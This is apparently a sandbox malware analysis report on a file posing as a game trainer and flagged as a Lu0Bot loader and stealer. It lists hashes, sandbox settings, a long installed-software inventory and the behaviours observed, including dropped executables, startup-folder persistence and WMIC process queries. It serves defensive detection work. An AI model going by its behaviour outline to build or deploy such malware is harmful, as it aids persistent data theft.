Malware analysis TrainerFL-build.36449.exe Malicious activity

Add for printing

File name:	TrainerFL-build.36449.exe
Full analysis:	https://app.any.run/tasks/4b106116-3f1c-4644-b47e-35f831df1e2c
Verdict:	Malicious activity
Threats:	A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Lu0Bot is a Node.js malware that was first discovered in February 2021. It is a type of Trojan that primarily acts as a stealer by responding to commands from a command-and-control (C2) server and transmitting encrypted system data. It can also operate as a DDoS bot. Lu0Bot employs multiple obfuscation techniques to avoid detection and make analysis more difficult. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	November 06, 2023, 06:28:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	loader lu0bot botnet backdoor stealer
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:	83D445F26E0296FEC152F61610884ED4
SHA1:	5B5CBC4E35E997E25CF74C6C68B318104C4DF21B
SHA256:	7FE19185D338C2EA659F8E908B06C2E8E96942553BCDDD4BD09DB295AAC6429D
SSDEEP:	48:Yfc8HYUXEEEEEEEEEwq0T2sy17O7rBS+R:cly17O7rAm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.19596 KB4534251
Adobe Acrobat Reader DC (20.013.20064)
Adobe Acrobat Reader DC (20.013.20064)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Refresh Manager (1.8.0)
Adobe Refresh Manager (1.8.0)
CCleaner (6.14)
CCleaner (6.14)
FileZilla 3.65.0 (3.65.0)
FileZilla 3.65.0 (3.65.0)
Google Chrome (109.0.5414.120)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.36.31)
Google Update Helper (1.3.36.31)
Java 8 Update 271 (8.0.2710.9)
Java 8 Update 271 (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java Auto Updater (2.8.271.9)
Microsoft .NET Framework 4.5.2 (4.5.51209)
Microsoft .NET Framework 4.5.2 (4.5.51209)
Microsoft .NET Framework 4.5.2 (4.5.51209)
Microsoft .NET Framework 4.5.2 (4.5.51209)
Microsoft Edge (109.0.1518.115)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.175.29)
Microsoft Edge Update (1.3.175.29)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (32-bit x86) (7.9.1)
Notepad++ (32-bit x86) (7.9.1)
PowerShell 7-x86 (7.2.11.0)
PowerShell 7-x86 (7.2.11.0)
Skype version 8.100 (8.100)
Skype version 8.100 (8.100)
VLC media player (3.0.11)
VLC media player (3.0.11)
WinRAR 5.91 (32-bit) (5.91.0)
WinRAR 5.91 (32-bit) (5.91.0)

Add for printing

MALICIOUS
- Drops the executable file immediately after the start
  - msiexec.exe (PID: 2900)
  - frdlcqsqkkw.exe (PID: 3936)
- Create files in the Startup directory
  - frdlcqsqkkw.exe (PID: 3936)
- LU0BOT has been detected (YARA)
  - frdlcqsqkkw.exe (PID: 3936)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - TrainerFL-build.36449.exe (PID: 3460)
- Process drops legitimate windows executable
  - msiexec.exe (PID: 2900)
- Reads the Windows owner or organization settings
  - msiexec.exe (PID: 2900)
- Reads the Internet Settings
  - WMIC.exe (PID: 3644)
- Uses WMIC.EXE to obtain data on processes
  - frdlcqsqkkw.exe (PID: 3276)
- Application launched itself
  - frdlcqsqkkw.exe (PID: 3276)
INFO
- Checks supported languages
  - msiexec.exe (PID: 2900)
  - TrainerFL-build.36449.exe (PID: 3460)
  - msiexec.exe (PID: 3612)
  - frdlcqsqkkw.exe (PID: 3276)
  - wmpnscfg.exe (PID: 3380)
  - frdlcqsqkkw.exe (PID: 3936)
  - wmpnscfg.exe (PID: 3744)
- Reads the computer name
  - msiexec.exe (PID: 2900)
